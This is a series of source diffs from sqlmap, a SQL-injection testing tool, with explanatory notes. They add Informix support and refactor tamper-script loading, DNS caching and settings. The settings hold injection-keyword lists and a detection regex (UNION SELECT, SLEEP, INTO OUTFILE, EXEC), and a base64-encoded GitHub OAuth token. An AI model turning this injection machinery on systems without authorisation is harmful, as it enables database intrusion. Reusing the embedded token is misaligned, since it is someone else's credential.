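    query = "SELECT %s" % expression
    query += FROM_DUMMY_TABLE.get(dbms, "")
    return query

print(forge_query("USER", "Informix"))  # SELECT USER FROM SYSMASTER:SYSDUAL
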

View File

@@ -34,6 +34,7 @@ class DBMS:
     SQLITE = "SQLite"
     SYBASE = "Sybase"
     HSQLDB = "HSQLDB"
+    INFORMIX = "Informix"

 class DBMS_DIRECTORY_NAME:
     ACCESS = "access"
@@ -47,6 +48,7 @@ class DBMS_DIRECTORY_NAME:
     SQLITE = "sqlite"
     SYBASE = "sybase"
     HSQLDB = "hsqldb"
+    INFORMIX = "informix"

 class CUSTOM_LOGGING:
     PAYLOAD = 9

View File

@@ -883,32 +883,32 @@ def _setTamperingFunctions():
         resolve_priorities = False
         priorities = []

-        for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
+        for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
             found = False

-            tfile = tfile.strip()
+            script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)

-            if not tfile:
+            if not script:
                 continue
-            elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)):
-                tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)
-            elif not os.path.exists(tfile):
-                errMsg = "tamper script '%s' does not exist" % tfile
+            elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)):
+                script = os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)
+            elif not os.path.exists(script):
+                errMsg = "tamper script '%s' does not exist" % script
                 raise SqlmapFilePathException(errMsg)
-            elif not tfile.endswith('.py'):
-                errMsg = "tamper script '%s' should have an extension '.py'" % tfile
+            elif not script.endswith(".py"):
+                errMsg = "tamper script '%s' should have an extension '.py'" % script
                 raise SqlmapSyntaxException(errMsg)

-            dirname, filename = os.path.split(tfile)
+            dirname, filename = os.path.split(script)
             dirname = os.path.abspath(dirname)

             infoMsg = "loading tamper script '%s'" % filename[:-3]
             logger.info(infoMsg)

-            if not os.path.exists(os.path.join(dirname, '__init__.py')):
+            if not os.path.exists(os.path.join(dirname, "__init__.py")):
                 errMsg = "make sure that there is an empty file '__init__.py' "
                 errMsg += "inside of tamper scripts directory '%s'" % dirname
                 raise SqlmapGenericException(errMsg)
@@ -917,11 +917,11 @@ def _setTamperingFunctions():
             sys.path.insert(0, dirname)

             try:
-                module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
+                module = __import__(filename[:-3])
             except (ImportError, SyntaxError), ex:
                 raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))

-            priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
+            priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__

             for name, function in inspect.getmembers(module, inspect.isfunction):
                 if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
@@ -953,7 +953,7 @@ def _setTamperingFunctions():
             if not found:
                 errMsg = "missing function 'tamper(payload, **kwargs)' "
-                errMsg += "in tamper script '%s'" % tfile
+                errMsg += "in tamper script '%s'" % script
                 raise SqlmapGenericException(errMsg)

         if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
@@ -1014,12 +1014,12 @@ def _setDNSCache():
     """

     def _getaddrinfo(*args, **kwargs):
-        if args in kb.cache:
-            return kb.cache[args]
+        if args in kb.cache.addrinfo:
+            return kb.cache.addrinfo[args]
         else:
-            kb.cache[args] = socket._getaddrinfo(*args, **kwargs)
-            return kb.cache[args]
+            kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)
+            return kb.cache.addrinfo[args]

     if not hasattr(socket, "_getaddrinfo"):
         socket._getaddrinfo = socket.getaddrinfo
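Note: the _setDNSCache() change above only moves the lookup cache into the dedicated kb.cache.addrinfo dictionary; the underlying trick is unchanged: socket.getaddrinfo is monkey-patched so repeated resolutions of the same host are answered from memory. A self-contained sketch of that pattern:

# Self-contained sketch of the getaddrinfo caching pattern used by _setDNSCache().
import socket

_addrinfo_cache = {}

def _set_dns_cache():
    def _getaddrinfo(*args, **kwargs):
        if args in _addrinfo_cache:
            return _addrinfo_cache[args]
        _addrinfo_cache[args] = socket._getaddrinfo(*args, **kwargs)
        return _addrinfo_cache[args]

    # Patch only once, keeping a reference to the original implementation
    if not hasattr(socket, "_getaddrinfo"):
        socket._getaddrinfo = socket.getaddrinfo
        socket.getaddrinfo = _getaddrinfo

_set_dns_cache()
socket.getaddrinfo("localhost", 80)  # first call performs the real lookup
socket.getaddrinfo("localhost", 80)  # second call is served from the cache
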
@@ -1396,16 +1396,12 @@ def _setHTTPExtraHeaders():
             raise SqlmapSyntaxException(errMsg)

     elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
-        conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5"))
-        if not conf.charset:
-            conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
-        else:
+        if conf.charset:
             conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))

         # Invalidating any caching mechanism in between
-        # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
-        conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store"))
-        conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache"))
+        # Reference: http://stackoverflow.com/a/1383359
+        conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))

 def _defaultHTTPUserAgent():
     """
@@ -1415,13 +1411,6 @@ def _defaultHTTPUserAgent():

     return "%s (%s)" % (VERSION_STRING, SITE)

-    # Firefox 3 running on Ubuntu 9.04 updated at April 2009
-    #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
-
-    # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english
-    # updated at March 2009
-    #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
-
 def _setHTTPUserAgent():
     """
     Set the HTTP User-Agent header.
@@ -1566,6 +1555,7 @@ def _createTemporaryDirectory():
                 os.makedirs(conf.tmpDir)

             _ = os.path.join(conf.tmpDir, randomStr())

             open(_, "w+b").close()
             os.remove(_)
@@ -1581,21 +1571,29 @@ def _createTemporaryDirectory():
     try:
         if not os.path.isdir(tempfile.gettempdir()):
             os.makedirs(tempfile.gettempdir())
-    except IOError, ex:
-        errMsg = "there has been a problem while accessing "
-        errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
-        errMsg += "make sure that there is enough disk space left. If problem persists, "
-        errMsg += "try to set environment variable 'TEMP' to a location "
-        errMsg += "writeable by the current user"
-        raise SqlmapSystemException, errMsg
+    except (OSError, IOError, WindowsError), ex:
+        warnMsg = "there has been a problem while accessing "
+        warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
+        warnMsg += "make sure that there is enough disk space left. If problem persists, "
+        warnMsg += "try to set environment variable 'TEMP' to a location "
+        warnMsg += "writeable by the current user"
+        logger.warn(warnMsg)

     if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
-        tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+        try:
+            tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+        except (OSError, IOError, WindowsError):
+            tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))

     kb.tempDir = tempfile.tempdir

     if not os.path.isdir(tempfile.tempdir):
+        try:
             os.makedirs(tempfile.tempdir)
+        except (OSError, IOError, WindowsError), ex:
+            errMsg = "there has been a problem while setting "
+            errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
+            raise SqlmapSystemException, errMsg

 def _cleanupOptions():
     """
@@ -1841,7 +1839,11 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.bruteMode = False

     kb.cache = AttribDict()
+    kb.cache.addrinfo = {}
     kb.cache.content = {}
+    kb.cache.encoding = {}
+    kb.cache.intBoundaries = None
+    kb.cache.parsedDbms = {}
     kb.cache.regex = {}
     kb.cache.stdev = {}
@@ -1975,7 +1977,6 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.threadContinue = True
     kb.threadException = False
     kb.tableExistsChoice = None
-    kb.timeValidCharsRun = 0
     kb.uChar = NULL
     kb.unionDuplicates = False
     kb.xpCmdshellAvailable = False

View File

@@ -235,6 +235,7 @@ optDict = {
         "profile": "boolean",
         "forceDns": "boolean",
         "ignore401": "boolean",
+        "murphyRate": "integer",
         "smokeTest": "boolean",
         "liveTest": "boolean",
         "stopFail": "boolean",

View File

@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
 """

 import os
+import random
 import re
 import subprocess
 import string
@@ -19,7 +20,7 @@ from lib.core.enums import OS
 from lib.core.revision import getRevisionNumber

 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.0.9.1"
+VERSION = "1.0.10.0"
 REVISION = getRevisionNumber()
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
@@ -31,11 +32,13 @@ GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
 GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"

 # colorful banner
-BANNER = """\033[01;33m    _
- ___ ___| |_____ ___ ___  \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
-|_ -| . | |     | .'| . |
-|___|_  |_|_|_|_|__,|  _|
-      |_|           |_|   \033[0m\033[4;37m%s\033[0m\n
+BANNER = """\033[01;33m\
+        ___
+       __H__
+ ___ ___[.]_____ ___ ___  \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
+|_ -| . [.]     | .'| . |
+|___|_  [.]_|_|_|__,|  _|
+      |_|V          |_|   \033[0m\033[4;37m%s\033[0m\n
 """ % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)

 # Minimum distance of ratio from kb.matchRatio to result in True
@@ -65,13 +68,14 @@ BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
 RANDOM_INTEGER_MARKER = "[RANDINT]"
 RANDOM_STRING_MARKER = "[RANDSTR]"
+SLEEP_TIME_MARKER = "[SLEEPTIME]"

 PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
 CHAR_INFERENCE_MARK = "%c"
 PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"

 # Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
-SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b"
+SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>([\w.]|`[^`<>]+`)+)"

 # Regular expression used for recognition of textual content-type
 TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
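Note: the reworked SELECT_FROM_TABLE_REGEX above additionally accepts backtick-quoted identifiers (e.g. MySQL-style `db`.`table`) in the FROM part. A quick illustrative check of the old pattern against the new one:

# Quick illustration of the old vs. new table-name extraction pattern.
import re

OLD = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b"
NEW = r"\bSELECT .+? FROM (?P<result>([\w.]|`[^`<>]+`)+)"

statement = "SELECT name FROM `test db`.`users` WHERE id=1"

print(re.search(OLD, statement))                  # None - backticks break the match
print(re.search(NEW, statement).group("result"))  # `test db`.`users`
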
@@ -85,6 +89,9 @@ MAX_CONNECTIONS_REGEX = r"max.+connections"
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) # Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
PRECONNECT_CANDIDATE_TIMEOUT = 10 PRECONNECT_CANDIDATE_TIMEOUT = 10
# Maximum sleep time in "Murphy" (testing) mode
MAX_MURPHY_SLEEP_TIME = 3
# Regular expression used for extracting results from Google search # Regular expression used for extracting results from Google search
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
@@ -129,7 +136,7 @@ UNION_STDEV_COEFF = 7
TIME_DELAY_CANDIDATES = 3 TIME_DELAY_CANDIDATES = 3
# Default value for HTTP Accept header # Default value for HTTP Accept header
HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" HTTP_ACCEPT_HEADER_VALUE = "*/*"
# Default value for HTTP Accept-Encoding header # Default value for HTTP Accept-Encoding header
HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
@@ -217,6 +224,7 @@ SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my") MYSQL_ALIASES = ("mysql", "my")
@@ -229,10 +237,11 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server") SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES
SUPPORTED_OS = ("linux", "windows") SUPPORTED_OS = ("linux", "windows")
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
@@ -298,9 +307,10 @@ FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P
ERROR_PARSING_REGEXES = ( ERROR_PARSING_REGEXES = (
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>", r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$", r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
r"<li>Error Type:<br>(?P<result>.+?)</li>", r"<li>Error Type:<br>(?P<result>.+?)</li>",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)", r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"(?m)^\s*\[[^\n]+(ODBC|JDBC)[^\n]+\](?P<result>[^\]]+in query expression[^\n]+)$" r"\[[^\n\]]+(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)"
) )
# Regular expression used for parsing charset info from meta html headers # Regular expression used for parsing charset info from meta html headers
@@ -364,7 +374,7 @@ MIN_ERROR_CHUNK_LENGTH = 8
MAX_ERROR_CHUNK_LENGTH = 1024 MAX_ERROR_CHUNK_LENGTH = 1024
# Do not escape the injected statement if it contains any of the following SQL keywords # Do not escape the injected statement if it contains any of the following SQL keywords
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK) EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "DBINFO(", "'%s'" % CHAR_INFERENCE_MARK)
# Mark used for replacement of reflected values # Mark used for replacement of reflected values
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__" REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
@@ -459,7 +469,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b" DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
# Extensions skipped by crawler # Extensions skipped by crawler
-CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
+CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
# Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -507,20 +517,20 @@ PARSE_HEADERS_LIMIT = 3
# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
ORDER_BY_STEP = 10
-# Maximum number of times for revalidation of a character in time-based injections
-MAX_TIME_REVALIDATION_STEPS = 5
+# Maximum number of times for revalidation of a character in inference (as required)
+MAX_REVALIDATION_STEPS = 5
# Characters that can be used to split parameter values in provided command line (e.g. in --tamper)
-PARAMETER_SPLITTING_REGEX = r'[,|;]'
+PARAMETER_SPLITTING_REGEX = r"[,|;]"
# Regular expression describing possible union char value (e.g. used in --union-char)
-UNION_CHAR_REGEX = r'\A\w+\Z'
+UNION_CHAR_REGEX = r"\A\w+\Z"
# Attribute used for storing original parameter value in special cases (e.g. POST)
-UNENCODED_ORIGINAL_VALUE = 'original'
+UNENCODED_ORIGINAL_VALUE = "original"
# Common column names containing usernames (used for hash cracking in some cases)
-COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor')
+COMMON_USER_COLUMNS = ("user", "username", "user_name", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor")
# Default delimiter in GET/POST values
DEFAULT_GET_POST_DELIMITER = '&'
@@ -532,7 +542,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA=="
+GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ=="
# Skip unforced HashDB flush requests below the threshold number of cached items
HASHDB_FLUSH_THRESHOLD = 32
@@ -544,7 +554,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "baFJusZrel" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
+HASHDB_MILESTONE_VALUE = "BkfRWrtCYK" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -570,6 +580,9 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
# Alphabet used for heuristic checks
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
+# Minor artistic touch
+BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER)
# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
@@ -583,7 +596,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger)
-MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
+MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
@@ -604,7 +617,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
+BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
# Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
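The BANNER substitution added above wraps one randomly chosen heuristic character of the ASCII banner in ANSI colour codes. A minimal standalone sketch of the same trick, using a made-up placeholder banner rather than sqlmap's real one:

import random
import re

HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')

# placeholder banner containing bracketed single-character slots such as "[.]"
BANNER = "sqlmap/1.0-dev [.] automatic SQL injection and database takeover tool"

# replace each "[x]" slot with a random heuristic character on a red background
# (\033[01;41m switches the background colour on, \033[01;49m switches it back off)
BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER)

print(BANNER)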

View File

@@ -68,7 +68,6 @@ from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.settings import USER_AGENT_ALIASES
